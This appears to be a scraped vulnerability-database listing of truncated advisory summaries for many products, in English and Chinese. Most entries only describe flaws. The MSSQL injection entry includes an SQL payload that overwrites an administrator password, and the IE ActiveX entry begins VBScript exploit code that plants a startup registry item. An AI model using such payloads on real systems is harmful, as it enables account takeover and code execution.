CVE-2004-0603

gzexe in gzip 1.3.3 and earlier will execute an argument when the creation of a temp file fails instead of exiting the program, which could allow remote attackers or local users to execute arbitrary commands, a different vulnerability than CVE-1999-1332...

Apple OS X 'blued' buffer overflow vulnerability

Apple OS X is a BSD-based operating system distributed by Apple. A buffer overflow vulnerability exists in 'blued' when Apple OS X handles XPC messages, which allows a local user to exploit the vulnerability to execute arbitrary code...

Cisco NX-OS Python Scripting Engine Root Access Vulnerability

Cisco NX-OS software is a data center-class operating system that embodies modular design, sustainability, and maintainability. Cisco NX-OS has a security vulnerability that allows a user with locally executable Python scripts to elevate privileges on the Python subsystem and gain root privileges...

Oracle Solaris Third-Party Patch Update : texinfo (cve_2006_4810_buffer_overflow)

The remote Solaris system is missing necessary patches to address security updates : - Buffer overflow in the readline function in util/texindex.c, as used by the 1 texi2dvi and 2 texindex commands, in texinfo 4.8 and earlier allows local users to execute arbitrary code via a crafted Texinfo file...

Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.PHP File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/15212/info Mantis is prone to a remote and local file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to execute...

RobTex Viking Server 1.0.6 Build 355 Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1614/info A number of unchecked buffers exists in Robotex Viking Server. This enables a malicious user to either crash the application or execute arbitrary code, depending on the data supplied. / Robotex Viking Server...

Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit

No description provided by source. / Sun Microsystems Solaris sysinfo Kernel Memory Disclosure exploit =================================================================== Local exploitation of an integer overflow vulnerability in Sun Microsystems Inc. Solaris allows attackers to read kernel memor...

HawtJNI: predictable temporary file name leading to local arbitrary code execution

The HawtJNI Library class wrote native libraries to a predictable file name in /tmp when the native libraries were bundled in a JAR file, and no custom library path was specified. A local attacker could overwrite these native libraries with malicious versions during the window between when HawtJN...

HawtJNI: predictable temporary file name leading to local arbitrary code execution

The HawtJNI Library class wrote native libraries to a predictable file name in /tmp when the native libraries were bundled in a JAR file, and no custom library path was specified. A local attacker could overwrite these native libraries with malicious versions during the window between when HawtJN...

Puppet Enterprise < 3.0.1 Multiple Vulnerabilities

According to its self-reported version number, the Puppet Enterprise install on the remote host is a version prior to 3.0.1. As a result, it reportedly has multiple vulnerabilities: - An error exists related to the included Ruby SSL client that could allow man-in-the-middle attacks. CVE-2013-4073...

CVE-2013-4256

Multiple stack-based and heap-based buffer overflows in Network Audio System NAS 1.9.3 allow local users to cause a denial of service crash or possibly execute arbitrary code via the 1 display command argument to the ProcessCommandLine function in server/os/utils.c; 2 ResetHosts function in...

SimpleTransfer 2.2.1 - Command Injection Vulnerabilities

Document Title: =============== SimpleTransfer 2.2.1 - Command Injection Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=937 Release Date: ============= 2013-05-02 Vulnerability Laboratory ID VL-ID: ==================================== 93...

Pitrinec MacroToolworks 7.5 Buffer Overflow

Title: ====== Pitrinec MacroToolworks 7.5 - Buffer Overflow Vulnerability Date: ===== 2012-03-08 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=466 VL-ID: ===== 466 Introduction: ============= Macro Toolworks is powerful all-in-one Windows automation macro software. It...

Apple Mac OS X本地特权提升漏洞(CVE-2011-3463)

Bugtraq ID: 51816 CVE ID：CVE-2011-3463 Apple Mac OS X是苹果公司发布的操作系统 WebDAV共享用户验证处理存在问题，在服务器上拥有合法账户的用户或其绑定的目录可以系统特权执行任意代码。此问题不影响OS X Lion之前版本 0 Apple Mac Os X Server 10.7.2 Apple Mac Os X Server 10.7.1 Apple Mac Os X Server 10.7 厂商解决方案 Apple Mac Os X Server 10.7.3已经修复此漏洞，建议用户下载使用：...

ghostscript: gs_init.ps searched in current directory despite -P-

Ghostscript 8.71 and earlier reads initialization files from the current working directory, which allows local users to execute arbitrary PostScript commands via a Trojan horse file, related to improper support for the -P- option to the gs program, as demonstrated using gsinit.ps, a different...

Mssql rebound injection record collection-vulnerability warning-the black bar safety net

One night a study of SA injection point when Hua B to I came some information Made up to do a recording. Skull more and more bad with the Hey Change the administrator password ‘;update user set pwd=’1519804e89226cf9893a05d9e3fc8bbb’ where LogonName=’hmingming’;– ----------------------------- Colu...

CVE-2010-4096

share/ma/keysforuser in Monkeysphere 0.31 and 0.32 allows local users to execute arbitrary code via unknown manipulations related to the "monkeysphere-authentication keys-for-user" command...

McAfee LinuxShield remote/local Code Execution Vulnerability

Exploit for unknown platform in category remote exploits ============================================================ McAfee LinuxShield remote/local Code Execution Vulnerability ============================================================ Title: McAfee LinuxShield remote/local code execution...

IE的ActiveX本地执行代码漏洞

clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 这段代码运行后并不会立即执行，它会向注册表中写入一个启动项，重启后就可以看到结果了！ IE6,7,8 暂时使用其它非IE内核的浏览器 html object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' /object script language='vbscript' targetFile = "c:\WINDOWS\system32\wshom.ocx" prototype = "Sub RegWrite ByVa...

HP-UX Update for envd HPSBUX02073

Check for the Version of envd OpenVAS Vulnerability Test HP-UX Update for envd HPSBUX02073 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the terms of the G...